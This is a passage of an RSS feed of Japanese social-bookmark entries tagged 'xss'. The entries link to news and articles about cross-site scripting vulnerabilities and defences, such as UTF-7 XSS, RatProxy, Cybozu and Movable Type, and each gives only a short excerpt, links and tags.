       gihyo.jp &raquo; ADMINISTRATOR STAGE &raquo; 連載 &raquo; 本当は怖い文字コードの話 &raquo; 第1回　UTF-7によるクロスサイトスクリプティング攻撃［前編］本当は怖い文字コードの話第1回　UTF-7によるクロスサイトスクリプティング攻撃［前編］  2009年3月20日 はせがわようすけ 文字コード, UTF-7, クロスサイトスクリプティングみなさん，はじめまして。はせがわようすけと申します。最近，文字コードと関連したセキュリティの話題を目にすることが増えてきました。文字コードを利用した攻撃は技術的に未開拓ということもあり，参考となる情報がなかなか見当たりません。この連載では，文字コードを利用した攻撃やそれに対する対策について正しい知識を解説していきます。文字コードとセキュリティが関連するもっとも大きな点は，やはり文字列の比較でしょう。「危険な文字列の検出」「安全な文字列であることの確認」といった文字列の比較は，セキュリティを考えるうえで避けて通れない処理だと思います。文字列の比較においては，単純にバイト列を比較するだけでは不十分で，文字列がメモリ...
       <a href="http://gihyo.jp/admin/serial/01/charcode/0001">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fgihyo.jp%2Fadmin%2Fserial%2F01%2Fcharcode%2F0001&amp;title=%E6%9C%AC%E5%BD%93%E3%81%AF%E6%80%96%E3%81%84%E6%96%87%E5%AD%97%E3%82%B3%E3%83%BC%E3%83%89%E3%81%AE%E8%A9%B1%EF%BC%9A%E7%AC%AC1%E5%9B%9E%E3%80%80UTF-7%E3%81%AB%E3%82%88%E3%82%8B%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E6%94%BB%E6%92%83%EF%BC%BB%E5%89%8D%E7%B7%A8%EF%BC%BD%EF%BD%9Cgihyo.jp%20%E2%80%A6%20%E6%8A%80%E8%A1%93%E8%A9%95%E8%AB%96%E7%A4%BE">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://gihyo.jp/admin/serial/01/charcode/0001</dc:source>
 <dc:identifier>745942</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-03-20T06:34:03Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>utf-7</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/utf-7"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fmedia%2Fstory%2F0%2C2000056023%2C20376601%2C00.htm&amp;title=%E3%82%B0%E3%83%BC%E3%82%B0%E3%83%AB%E3%80%81%E3%82%A6%E3%82%A7%E3%83%96%E8%84%86%E5%BC%B1%E6%80%A7%E6%A4%9C%E7%9F%A5%E3%83%84%E3%83%BC%E3%83%AB%E3%80%8CRatProxy%E3%80%8D%E3%82%92%E3%83%AA%E3%83%AA%E3%83%BC%E3%82%B9%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
 <title>グーグル、ウェブ脆弱性検知ツール「RatProxy」をリリース:ニュース - CNET Japan</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fmedia%2Fstory%2F0%2C2000056023%2C20376601%2C00.htm&amp;title=%E3%82%B0%E3%83%BC%E3%82%B0%E3%83%AB%E3%80%81%E3%82%A6%E3%82%A7%E3%83%96%E8%84%86%E5%BC%B1%E6%80%A7%E6%A4%9C%E7%9F%A5%E3%83%84%E3%83%BC%E3%83%AB%E3%80%8CRatProxy%E3%80%8D%E3%82%92%E3%83%AA%E3%83%AA%E3%83%BC%E3%82%B9%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan</link>
 
  
   <description>
     <![CDATA[
       　Googleは米国時間7月1日、ウェブ開発者がクロスサイト脆弱性を発見し、修正するためのツールをリリースした。　Googleによると、「RatProxy」と呼ばれるこの無料ツールは、半自動化された大部分が受動型のウェブアプリケーションセキュリティ監視ツールで、複雑なWeb 2.0環境における既存の...
       <a href="http://japan.cnet.com/news/media/story/0,2000056023,20376601,00.htm">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fmedia%2Fstory%2F0%2C2000056023%2C20376601%2C00.htm&amp;title=%E3%82%B0%E3%83%BC%E3%82%B0%E3%83%AB%E3%80%81%E3%82%A6%E3%82%A7%E3%83%96%E8%84%86%E5%BC%B1%E6%80%A7%E6%A4%9C%E7%9F%A5%E3%83%84%E3%83%BC%E3%83%AB%E3%80%8CRatProxy%E3%80%8D%E3%82%92%E3%83%AA%E3%83%AA%E3%83%BC%E3%82%B9%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://japan.cnet.com/news/media/story/0,2000056023,20376601,00.htm</dc:source>
 <dc:identifier>383746</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2008-07-04T05:39:15Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>csrf</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>summarysite</dc:subject>
 <dc:subject>webapplication</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>sqlinjection</dc:subject>
 <dc:subject>commandinjection</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/csrf"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/summarysite"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/webapplication"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/sqlinjection"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/commandinjection"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20395680%2C00.htm&amp;title=%E3%83%AC%E3%83%83%E3%83%84PHP%21%E3%81%AEBBS%E3%82%BD%E3%83%95%E3%83%88%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
 <title>レッツPHP!のBBSソフトにクロスサイトスクリプティングの脆弱性:ニュース - CNET Japan</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20395680%2C00.htm&amp;title=%E3%83%AC%E3%83%83%E3%83%84PHP%21%E3%81%AEBBS%E3%82%BD%E3%83%95%E3%83%88%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan</link>
 
  
   <description>
     <![CDATA[
       レッツPHP!のBBSソフトにクロスサイトスクリプティングの脆弱性:ニュース - CNET JapanCNET JapanCNET_IDメールマガジンフィードサイトマップトップニュース特集オピニオンブログホワイトペーパーリサーチベンチャーレビューモバイルマーケティングアップルゲーム■ 経営一般■ 情...
       <a href="http://japan.cnet.com/news/sec/story/0,2000056024,20395680,00.htm">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20395680%2C00.htm&amp;title=%E3%83%AC%E3%83%83%E3%83%84PHP%21%E3%81%AEBBS%E3%82%BD%E3%83%95%E3%83%88%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://japan.cnet.com/news/sec/story/0,2000056024,20395680,00.htm</dc:source>
 <dc:identifier>1064306</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-06-29T10:06:27Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>php</dc:subject>
 <dc:subject>bbs</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>directorytraversal</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/php"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/bbs"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/directorytraversal"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fkinshachi.ddo.jp%2Fkurage%2Fhtml%2FMT%2Fcomp%2Farchives%2F000445.html&amp;title=%E3%82%B3%E3%83%B3%E3%83%94%E3%83%A5%E3%83%BC%E3%82%BF%E7%B3%BBblog%3A%20%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E5%AF%BE%E7%AD%96">
 <title>コンピュータ系blog: クロスサイトスクリプティング対策</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fkinshachi.ddo.jp%2Fkurage%2Fhtml%2FMT%2Fcomp%2Farchives%2F000445.html&amp;title=%E3%82%B3%E3%83%B3%E3%83%94%E3%83%A5%E3%83%BC%E3%82%BF%E7%B3%BBblog%3A%20%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E5%AF%BE%E7%AD%96</link>
 
  
   <description>
     <![CDATA[
                                                                                           コンピュータ系blog                        コンピューター系のblogになる予定です。(blog名のまま)古いEntryにも時々手を加えてます。コメント書き込んでくれるとうれしいなぁ:-)。月1更新を目標にしたい、、、(それも厳しい昨今)<br />お知らせ：コメントを書いてもレスポンスが返ってくるまで時間がかかる事があるみたい。気長に待ってくださいな・・・。<br />                                                                                                                                    クロスサイトスクリプティング対策                    2004&#24180;2&#26376;13&#26085; 02:52        | 個別ページ    | コメント(0)    | ト...
       <a href="http://kinshachi.ddo.jp/kurage/html/MT/comp/archives/000445.html">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fkinshachi.ddo.jp%2Fkurage%2Fhtml%2FMT%2Fcomp%2Farchives%2F000445.html&amp;title=%E3%82%B3%E3%83%B3%E3%83%94%E3%83%A5%E3%83%BC%E3%82%BF%E7%B3%BBblog%3A%20%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E5%AF%BE%E7%AD%96">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://kinshachi.ddo.jp/kurage/html/MT/comp/archives/000445.html</dc:source>
 <dc:identifier>68529</dc:identifier>
 <dc:creator>fairy</dc:creator>
 <dc:date>2007-04-01T01:50:07Z</dc:date>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20363171%2C00.htm&amp;title=%E3%82%B5%E3%82%A4%E3%83%9C%E3%82%A6%E3%82%BAOffice%E3%82%84%E3%82%AC%E3%83%AB%E3%83%BC%E3%83%B3%E3%81%AB%E8%84%86%E5%BC%B1%E6%80%A7--XSS%E3%82%84HTTP%E3%83%98%E3%83%83%E3%83%80%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E3%81%AA%E3%81%A9%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
 <title>サイボウズOfficeやガルーンに脆弱性--XSSやHTTPヘッダインジェクションなど:ニュース - CNET Japan</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20363171%2C00.htm&amp;title=%E3%82%B5%E3%82%A4%E3%83%9C%E3%82%A6%E3%82%BAOffice%E3%82%84%E3%82%AC%E3%83%AB%E3%83%BC%E3%83%B3%E3%81%AB%E8%84%86%E5%BC%B1%E6%80%A7--XSS%E3%82%84HTTP%E3%83%98%E3%83%83%E3%83%80%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E3%81%AA%E3%81%A9%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan</link>
 
  
   <description>
     <![CDATA[
       サイボウズOfficeやガルーンに脆弱性--XSSやHTTPヘッダインジェクションなど:ニュース - CNET Japan       CNET_IDメールマガジンフィードポッドキャストツールサイトマップトップニュース特集オピニオンブログホワイトペーパーリサーチワークスタイルベンチャーレビューモバイ...
       <a href="http://japan.cnet.com/news/sec/story/0,2000056024,20363171,00.htm">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20363171%2C00.htm&amp;title=%E3%82%B5%E3%82%A4%E3%83%9C%E3%82%A6%E3%82%BAOffice%E3%82%84%E3%82%AC%E3%83%AB%E3%83%BC%E3%83%B3%E3%81%AB%E8%84%86%E5%BC%B1%E6%80%A7--XSS%E3%82%84HTTP%E3%83%98%E3%83%83%E3%83%80%E3%82%A4%E3%83%B3%E3%82%B8%E3%82%A7%E3%82%AF%E3%82%B7%E3%83%A7%E3%83%B3%E3%81%AA%E3%81%A9%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://japan.cnet.com/news/sec/story/0,2000056024,20363171,00.htm</dc:source>
 <dc:identifier>211510</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2007-12-12T12:56:43Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>cybozu</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>summarysite</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>httpheaderinjection</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/cybozu"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/summarysite"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/httpheaderinjection"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.zdnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056194%2C20388111%2C00.htm&amp;title=%E3%83%9E%E3%82%A4%E3%82%AF%E3%83%AD%E3%82%BD%E3%83%95%E3%83%88%E3%81%AE%E6%A4%9C%E7%B4%A2%E3%83%97%E3%83%A9%E3%83%83%E3%83%88%E3%83%95%E3%82%A9%E3%83%BC%E3%83%A0%E3%80%8CFAST%20ESP%E3%80%8D%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%20-%20ZDNet%20Japan">
 <title>マイクロソフトの検索プラットフォーム「FAST ESP」にクロスサイトスクリプティングの脆弱性 - ZDNet Japan</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.zdnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056194%2C20388111%2C00.htm&amp;title=%E3%83%9E%E3%82%A4%E3%82%AF%E3%83%AD%E3%82%BD%E3%83%95%E3%83%88%E3%81%AE%E6%A4%9C%E7%B4%A2%E3%83%97%E3%83%A9%E3%83%83%E3%83%88%E3%83%95%E3%82%A9%E3%83%BC%E3%83%A0%E3%80%8CFAST%20ESP%E3%80%8D%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%20-%20ZDNet%20Japan</link>
 
  
   <description>
     <![CDATA[
       ZDNet Japan Brand Site:ZDNet Japanbuilder検索：ZDNetbuilderRSSサイトマップ CNET_IDログインZDNet Japanトップビジネスインダストリトピック金融製造公共小売物流通信ネットビジネスマネジメントトピック財務人事マネジメントキャリア・転職メンタルヘルスビジネストピックユーザー事例業界動向英語資格・学習テクノロジーテクノロジートレンドセキュリティガバナンス・運用管理Notesの次を考えるソーシャルテクノロジ経営が知るべきバズワード新しいOSの選択肢これはひどい！ITの話デベロッパーbuilder by ZDNet Japanホワイトペーパー製品用語リファレンスダッシュボード ビジネスリソースプレスリリースイベント情報企業情報センターインフォメーションZDNet Japanのイベントサイトマップニュース &raquo; セキュリティマイクロソフトの検索プラットフォーム「FAST ESP」にクロスサイトスクリプティングの脆弱性JPCERT/CCは、マイクロソフトの検索プラットフォーム「FAST ESP」に、クロスサイトスクリプティングの脆弱性が存在する...
       <a href="http://japan.zdnet.com/news/sec/story/0,2000056194,20388111,00.htm">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fjapan.zdnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056194%2C20388111%2C00.htm&amp;title=%E3%83%9E%E3%82%A4%E3%82%AF%E3%83%AD%E3%82%BD%E3%83%95%E3%83%88%E3%81%AE%E6%A4%9C%E7%B4%A2%E3%83%97%E3%83%A9%E3%83%83%E3%83%88%E3%83%95%E3%82%A9%E3%83%BC%E3%83%A0%E3%80%8CFAST%20ESP%E3%80%8D%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%20-%20ZDNet%20Japan">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://japan.zdnet.com/news/sec/story/0,2000056194,20388111,00.htm</dc:source>
 <dc:identifier>697449</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-02-13T07:38:40Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>microsoft</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>fastesp</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/microsoft"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/fastesp"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Finternet.watch.impress.co.jp%2Fcda%2Fnews%2F2007%2F02%2F02%2F14669.html&amp;title=IPA%E3%80%81%E3%82%BB%E3%83%9F%E3%83%8A%E3%83%BC%E5%8F%97%E4%BB%98%E3%83%95%E3%82%A9%E3%83%BC%E3%83%A0%E3%81%ABXSS%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%8C%E8%A6%8B%E3%81%A4%E3%81%8B%E3%82%8B">
 <title>IPA、セミナー受付フォームにXSSの脆弱性が見つかる</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Finternet.watch.impress.co.jp%2Fcda%2Fnews%2F2007%2F02%2F02%2F14669.html&amp;title=IPA%E3%80%81%E3%82%BB%E3%83%9F%E3%83%8A%E3%83%BC%E5%8F%97%E4%BB%98%E3%83%95%E3%82%A9%E3%83%BC%E3%83%A0%E3%81%ABXSS%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%8C%E8%A6%8B%E3%81%A4%E3%81%8B%E3%82%8B</link>
 
  
   <description>
     <![CDATA[
             記事検索 最新ニュース【 2008/04/07 】■自動車サイト「carview.co.jp」、改竄によりウイルスを仕込まれる<br />［19:47］■BIGLOBEがトップページをリニューアル、ニュース枠などを強化<br />［18:50］■朝日ネット、「カーボンオフセット付き光接続サービス」提供へ<br />［18:28］■日立システム、「セキュリティかるたスクリーンセーバー」など公開<br />［17:49］■「Google」日本語版のロゴが鉄腕アトムに、生誕5周年記念<br />［17:36］■「BitCash」1円単位で購入可能に、ファミマの端末で15日開始<br />［16:28］■ガンプラやフィギュアなど通販の「T.J GrosNet」で商品未着被害<br />［15:53］■ソニー、「eyeVio」でJASRAC管理楽曲を使用した動画の投稿に対応<br />［15:20］■「プリペイドサービス」のセブンイレブン店舗販売を9日開始<br />［15:14］■駅探、Vista用サイドバーガジェット「乗り換え時刻表」を公開<br />［14:40］■「.eu」2007年は30万件の登録<br />［14:24］■「トミカのタイヤだけを購入できる」タカラトミー子会社の通販サイト刷新<br />［13:47］         IP...
       <a href="http://internet.watch.impress.co.jp/cda/news/2007/02/02/14669.html">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Finternet.watch.impress.co.jp%2Fcda%2Fnews%2F2007%2F02%2F02%2F14669.html&amp;title=IPA%E3%80%81%E3%82%BB%E3%83%9F%E3%83%8A%E3%83%BC%E5%8F%97%E4%BB%98%E3%83%95%E3%82%A9%E3%83%BC%E3%83%A0%E3%81%ABXSS%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E3%81%8C%E8%A6%8B%E3%81%A4%E3%81%8B%E3%82%8B">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://internet.watch.impress.co.jp/cda/news/2007/02/02/14669.html</dc:source>
 <dc:identifier>53288</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2007-02-02T12:58:49Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>ipa</dc:subject>
 <dc:subject>hamachi</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/ipa"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/hamachi"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20395678%2C00.htm&amp;title=%E3%83%96%E3%83%AD%E3%82%B0%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0%E3%80%8CMovable%20Type%E3%80%8D%E3%81%AB%E8%A4%87%E6%95%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
 <title>ブログシステム「Movable Type」に複数の脆弱性:ニュース - CNET Japan</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20395678%2C00.htm&amp;title=%E3%83%96%E3%83%AD%E3%82%B0%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0%E3%80%8CMovable%20Type%E3%80%8D%E3%81%AB%E8%A4%87%E6%95%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan</link>
 
  
   <description>
     <![CDATA[
       ブログシステム「Movable Type」に複数の脆弱性:ニュース - CNET JapanCNET JapanCNET_IDメールマガジンフィードサイトマップトップニュース特集オピニオンブログホワイトペーパーリサーチベンチャーレビューモバイルマーケティングアップルゲーム■ 経営一般■ 情報システム...
       <a href="http://japan.cnet.com/news/sec/story/0,2000056024,20395678,00.htm">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20395678%2C00.htm&amp;title=%E3%83%96%E3%83%AD%E3%82%B0%E3%82%B7%E3%82%B9%E3%83%86%E3%83%A0%E3%80%8CMovable%20Type%E3%80%8D%E3%81%AB%E8%A4%87%E6%95%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://japan.cnet.com/news/sec/story/0,2000056024,20395678,00.htm</dc:source>
 <dc:identifier>1064284</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-06-29T10:02:07Z</dc:date>
 <dc:subject>blog</dc:subject>
 <dc:subject>security</dc:subject>
 <dc:subject>movabletype</dc:subject>
 <dc:subject>脆弱性</dc:subject>
 <dc:subject>踏み台</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>6a</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/blog"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/movabletype"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E8%84%86%E5%BC%B1%E6%80%A7"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E8%B8%8F%E3%81%BF%E5%8F%B0"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/6a"/>
  </rdf:Bag>
 </taxo:topics>
</item>

